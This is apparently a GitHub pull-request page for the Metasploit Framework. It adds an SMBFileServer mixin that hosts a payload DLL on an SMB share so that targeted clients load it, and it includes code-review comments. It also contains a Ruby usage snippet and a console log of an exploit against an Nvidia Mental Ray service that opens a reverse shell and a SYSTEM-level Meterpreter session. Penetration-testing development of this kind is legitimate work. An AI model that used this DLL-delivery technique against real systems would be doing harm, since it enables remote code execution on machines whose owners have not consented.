Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

Implement SMBFileServer mixin. #3075

Closed
wants to merge 12 commits into
from

Conversation

Projects
None yet
9 participants
Contributor

0x41414141 commented Mar 7, 2014

In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):
include Msf::Exploit::Remote::SMBFileServer
exe = generate_payload_dll
@exe_file = rand_text_alpha(7) + ".dll"
@share = rand_text_alpha(5)
my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
Rex::Socket.source_address : datastore['SRVHOST']
@unc = "#{my_host}#{@share}#{@exe_file}"
start_smb_server(@unc, exe, @exe_file)
// Inject DLL
handle

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb

Implement SMBFileServer mixin.
In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):
 include Msf::Exploit::Remote::SMBFileServer
 exe = generate_payload_dll
 @exe_file = rand_text_alpha(7) + ".dll"
 @share = rand_text_alpha(5)
 my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
 Rex::Socket.source_address : datastore['SRVHOST']
 @unc = "\\#{my_host}\#{@share}\#{@exe_file}"
 start_smb_server(@unc, exe, @exe_file)
 // Inject DLL
 handle

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb
Contributor

wchen-r7 commented Mar 7, 2014

ccing @jlee-r7 because he's been working on smb.

Contributor

0x41414141 commented Mar 7, 2014

Noting build failure due to requirement to merge #3074

Contributor

Meatballs1 commented Mar 8, 2014

Awesome, I just merged this (and rex PR) into the Nvidia Mental Ray exploit and it worked like a charm:

msf exploit(nvidia_mental_ray) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.151:4444 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\192.168.1.151\wrXaY\RywMfSx.dll
[*] Payload sent
[*] 192.168.1.117    nvidia_mental_ray - Connected to Listener
[*] Command shell session 1 opened (192.168.1.151:4444 -> 192.168.1.117:54397) at 2014-03-08 16:10:33 +0000

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Autodesk\mrsat3.11.1-maya2014\bin>
msf exploit(nvidia_mental_ray) > exploit

[*] Started reverse handler on 192.168.1.151:4444 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\192.168.1.151\dYHZv\igkrYps.dll
[*] Payload sent
[*] 192.168.1.117    nvidia_mental_ray - Connected to Listener
[*] Sending stage (971264 bytes) to 192.168.1.117
[*] Meterpreter session 2 opened (192.168.1.151:4444 -> 192.168.1.117:54414) at 2014-03-08 16:12:07 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@Meatballs1 Meatballs1 referenced this pull request Mar 8, 2014

Closed

Nvidia Mental Ray Service Exploit #3079

2 of 4 tasks complete
Contributor

Meatballs1 commented Mar 8, 2014

Hmm I would expect this to be 'Passive' like a HTTP exploit - it will just sit in the background until a connection from the client arrives?

Contributor

0x41414141 commented Mar 9, 2014

Awesome :-) glad to see it works for you aswell. It could be refactored easily enough to be a passive service, for the exploit I was working on I just needed to spin up an smb server to serve a file. The 'def cleanup' means the server will be closed once 'handle' is called. This could be ifdef'd to either close automatically, or specifically call 'stop' if another function is called.

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
@@ -826,6 +826,56 @@ def smb_error(cmd, c, errorclass, esn = false)
end
+# Name: SMBFileServer
+# Description: In order to accomplish remote file injection (e.g. DLL) this module emulates an SMB service process to allow clients to load a file from a network share.
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

Doc comments should follow yardoc conventions and wrap at 78 columns, please

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

unused

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
+ UTILS = ::Rex::Proto::SMB::Utils
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

This is unnecessary, just use the class name where you need it

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ OptString.new('SRVHOST', [ true, 'The local host the SMB Server is running on', '0.0.0.0']),
+ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 445 ])
+ ], self.class)
+ register_advanced_options(
+ [
+ OptBool.new('SMB_DEBUG', [ false, 'Enable SMBServer debugging messages', false])
+ ], self.class )
+ @server = nil
+ end
+
+ def cleanup
+ super
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

Stopping the server should happen in an ensure in case the super raises.

def cleanup
  begin
    super
  ensure
    @server.stop if @server
  end
end

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
+ UTILS = ::Rex::Proto::SMB::Utils
+
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ OptString.new('SRVHOST', [ true, 'The local host the SMB Server is running on', '0.0.0.0']),
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

This should be an OptAddress

0x41414141 added some commits Mar 12, 2014

Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
 * Doc comments wrap at 78 chars to follow yardoc convention
 * Remove unused :server and SERVER vals
 * Use Utils class directly
 * Stop server within an ensure
 * Change SRVHOST to an OptAddress

@todb-r7 todb-r7 added the library label May 30, 2014

Contributor

hdm commented Jul 6, 2014

Marking as delayed since this depends on a lot of rework in #3074

@hdm hdm added the delayed label Jul 6, 2014

@todb-r7 todb-r7 added the feature label Nov 11, 2014

@0x41414141 0x41414141 referenced this pull request Dec 22, 2014

Merged

CVE 2014-2623 - HP Data Protector 8.10 RCE #4451

0 of 3 tasks complete
Contributor

todb-r7 commented Jan 21, 2015

This depends, still, on #3074, which does appear to be live (committed against less than a month back).

However, it is in a conflict state, so that'll want to get resolved (likely against #3074).

@jvazquez-r7 jvazquez-r7 self-assigned this Feb 13, 2015

jvazquez-r7 added a commit to jvazquez-r7/metasploit-framework that referenced this pull request Feb 13, 2015

wvu-r7 and others added some commits Feb 17, 2015

Implement SMBFileServer mixin.
In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):
 include Msf::Exploit::Remote::SMBFileServer
 exe = generate_payload_dll
 @exe_file = rand_text_alpha(7) + ".dll"
 @share = rand_text_alpha(5)
 my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
 Rex::Socket.source_address : datastore['SRVHOST']
 @unc = "\\#{my_host}\#{@share}\#{@exe_file}"
 start_smb_server(@unc, exe, @exe_file)
 // Inject DLL
 handle

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb
Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
 * Doc comments wrap at 78 chars to follow yardoc convention
 * Remove unused :server and SERVER vals
 * Use Utils class directly
 * Stop server within an ensure
 * Change SRVHOST to an OptAddress
Merge branch 'module-exploitsmbfileserver' of github.com:0x41414141/m…
…etasploit-framework into module-exploitsmbfileserver

@todb-r7 todb-r7 removed the delayed label Feb 18, 2015

Contributor

jvazquez-r7 commented Feb 19, 2015

It is being handled on #3074.

@Meatballs1 Meatballs1 referenced this pull request Mar 5, 2015

Merged

Nvidia mental ray take 3 #4884

5 of 5 tasks complete

@0x41414141 0x41414141 deleted the 0x41414141:module-exploitsmbfileserver branch Mar 6, 2015

@bcook-r7 bcook-r7 added the delayed label Feb 1, 2016

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment